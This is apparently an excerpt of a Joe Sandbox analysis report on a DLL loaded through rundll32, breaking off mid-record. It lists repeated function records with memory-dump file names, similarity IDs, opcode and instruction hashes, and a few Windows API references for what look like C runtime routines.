                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+Replicator::operator[]
                                                                                                                                                                                                                            • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                                                            • API String ID: 1405650943-2211150622
                                                                                                                                                                                                                            • Opcode ID: 11a5eadd5112610793a0c7985b347ede0ac6dc60e7be4f47023946e3fa5dab14
                                                                                                                                                                                                                            • Instruction ID: 1562cc7920372f8d96896f4d2247b54c2eb0bb003fb5d717fc29c8b40e6cc5f0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 11a5eadd5112610793a0c7985b347ede0ac6dc60e7be4f47023946e3fa5dab14
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA415FB6605F8898FBA28B68D8413EC77A0B30D788F54C415EA4817794DF79C749C711
                                                                                                                                                                                                                            Function 000000018001568C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 79COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                                                                            • String ID: char $int $long $short $unsigned
                                                                                                                                                                                                                            • API String ID: 2943138195-3894466517
                                                                                                                                                                                                                            • Opcode ID: 22589a7dd1b7f51ecc45e5e498e836ee65e773c3e0422199170bc379ef7ced78
                                                                                                                                                                                                                            • Instruction ID: 33d68ee0dd99e5be83c02a107bf8deb86d92894b08a7c1c4eda6edb91acda212
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 22589a7dd1b7f51ecc45e5e498e836ee65e773c3e0422199170bc379ef7ced78
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71316876614B58C8FB968F68E8513EC37B1B34D789F54C115EA885BBA8DF38C648C740
                                                                                                                                                                                                                            Function 000000018000FBA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                            • Opcode ID: d889f2a22313e0ad3e013d7ebc648a4845f7bed772ca03482db31a9999fe791a
                                                                                                                                                                                                                            • Instruction ID: b4b3ab6b1088bd05896873025a869169f262880e2f39a8d17b8af41b45206a1e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d889f2a22313e0ad3e013d7ebc648a4845f7bed772ca03482db31a9999fe791a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6218231601A4881FAA6CB16A9057A973A4BB4CBF0F5C8735FE2D47BD1EF38C6499300
                                                                                                                                                                                                                            Function 0000000180048058 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71libraryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                            • API String ID: 3813093105-537541572
                                                                                                                                                                                                                            • Opcode ID: 4da3f0794fd9870cc95b278e97dc4f2c9283c1eed835cc8f1e9aaf627fd9e4b8
                                                                                                                                                                                                                            • Instruction ID: 16723c8e79fef191a1def12aff24d5b2aa2a9400166a0adaba498011b7871d09
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4da3f0794fd9870cc95b278e97dc4f2c9283c1eed835cc8f1e9aaf627fd9e4b8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36217531311E4481EEA6CB16A8407992294BF4CBF4F59CB21FE2A577D5DF38C64A9304
                                                                                                                                                                                                                            Function 000000018004832C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 66libraryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                            • API String ID: 3813093105-537541572
                                                                                                                                                                                                                            • Opcode ID: 34d9fc0eea32f26ddee014de4325216aa93237d5f4069420858160f0f9dadc4b
                                                                                                                                                                                                                            • Instruction ID: 2907248bf1d03caf4a9efb5c727e6e4733018bdc7bf12693e50b486c0c56baec
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34d9fc0eea32f26ddee014de4325216aa93237d5f4069420858160f0f9dadc4b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3521D332311F5881EAA6DB1698403A92390FB4DFE4F198725EF2A437D0DF38C60A8344
                                                                                                                                                                                                                            Function 0000000180041790 Relevance: 10.6, APIs: 7, Instructions: 62COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                            • Opcode ID: 931a7e6b1cf67cd6299caf61b7569a609212fd61884ef39ea5164ef7719851e4
                                                                                                                                                                                                                            • Instruction ID: d1b00c180fb1e660eff0b05203a4b174045681b8f2dca1d24339f74a07491a67
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 931a7e6b1cf67cd6299caf61b7569a609212fd61884ef39ea5164ef7719851e4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56219F30704E0C45FAD7632155953FD1292BF4C7F9F1ACB18B836076C6EE288B095389
                                                                                                                                                                                                                            Function 00000001800415D4 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                            • Opcode ID: 381c2f5c7cc53769a437e8260949d7a39dcceed1a2f38c0e1111b755c595ed80
                                                                                                                                                                                                                            • Instruction ID: 04686a5da5c4fff237ec5e8ba751c2965937e5176a8ea2e8cb852f05b55094a1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 381c2f5c7cc53769a437e8260949d7a39dcceed1a2f38c0e1111b755c595ed80
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4116D30205E484AFAD6632155E53FD5242BB4C7F9F1ACB28B836077D6EE38CB095749
                                                                                                                                                                                                                            Function 000000018005B3FC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                            • Opcode ID: b6eeb1184294491e34f956f19ce6396f0c04242531a228f3773a2e0d11010417
                                                                                                                                                                                                                            • Instruction ID: 83e0178ae380f36e1e9820465d588016c920ebf69cf6b00601a2110171500775
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6eeb1184294491e34f956f19ce6396f0c04242531a228f3773a2e0d11010417
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26119032310B8486E7A18B52F85535963A4F78CBE4F148224FA5987B94DF7DC6588740
                                                                                                                                                                                                                            Function 00000001800157B4 Relevance: 9.2, APIs: 6, Instructions: 161COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+$NameName::
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 168861036-0
                                                                                                                                                                                                                            • Opcode ID: 806119ddee8275eca90a34da7f6d98c465c2b67501ebe87a489ba9b8b95362ce
                                                                                                                                                                                                                            • Instruction ID: 09ad68218d141e964a4945e14ce8a54b78ee7b9198dbdf3b1dfc829bb6e04cef
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 806119ddee8275eca90a34da7f6d98c465c2b67501ebe87a489ba9b8b95362ce
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7719D72610B98C9FB92CFA4E8803EC37A1F349795F61C016EA891B795DF79C659C301
                                                                                                                                                                                                                            Function 000000018000CDF8 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 319COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                            • API String ID: 3523768491-393685449
                                                                                                                                                                                                                            • Opcode ID: bda6544fe4ae76e9c966046574d2ab8aba2e0a6057aceda30bee322fd5c5b1c4
                                                                                                                                                                                                                            • Instruction ID: f316bf09ab0905bbfcd6d3bf85c0ee5a6f9e6efb4081dae354aa448471526a42
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bda6544fe4ae76e9c966046574d2ab8aba2e0a6057aceda30bee322fd5c5b1c4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8E1AE725047888AE7A2DF78D4803ED7BA1F759788F148226FF8957696CF34C689CB01
                                                                                                                                                                                                                            Function 0000000180041908 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 0000000180041917
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004194D
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004197A
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004198B
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004199C
                                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 00000001800419B7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                            • Opcode ID: 06c95a4aa1771613fd3935f9b6fa3d2226365f91a529870d9feca7c030eab943
                                                                                                                                                                                                                            • Instruction ID: a236a635390231764599b441ca33359ecfb18b4257108ec610f8a3aa5a970b1f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06c95a4aa1771613fd3935f9b6fa3d2226365f91a529870d9feca7c030eab943
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01118E30204E4846F6D6632155A53FD5242BB4C7F9F15C724F876177C6EE288B095749
                                                                                                                                                                                                                            Function 0000000180016F68 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                                                                            • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                                                                                                                                                            • API String ID: 2943138195-757766384
                                                                                                                                                                                                                            • Opcode ID: 037b52de5d520ae03becac24376554bd3a1233cb3c82c6952893d7c61cf1fdce
                                                                                                                                                                                                                            • Instruction ID: 4038f050409aa154ac6b01109c2d1ae91dabd18faee6e66f8a741a0bb842cd02
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 037b52de5d520ae03becac24376554bd3a1233cb3c82c6952893d7c61cf1fdce
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2716A76701B4898EB968F68D8503EC66B5B30D7C4F94C529FA5907BA6DF39C3A8C340
                                                                                                                                                                                                                            Function 0000000180018CB8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 89COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NameName::
                                                                                                                                                                                                                            • String ID: `template-parameter$void
                                                                                                                                                                                                                            • API String ID: 1333004437-4057429177
                                                                                                                                                                                                                            • Opcode ID: 0be1fb5e2f1216bc1b940a859d571dac6121c46e0836de7767b4ce6883e4aeb3
                                                                                                                                                                                                                            • Instruction ID: 6b3cef5dec8401bd2ebba64d188ad0518e1c0495917126e62d011a98b4116422
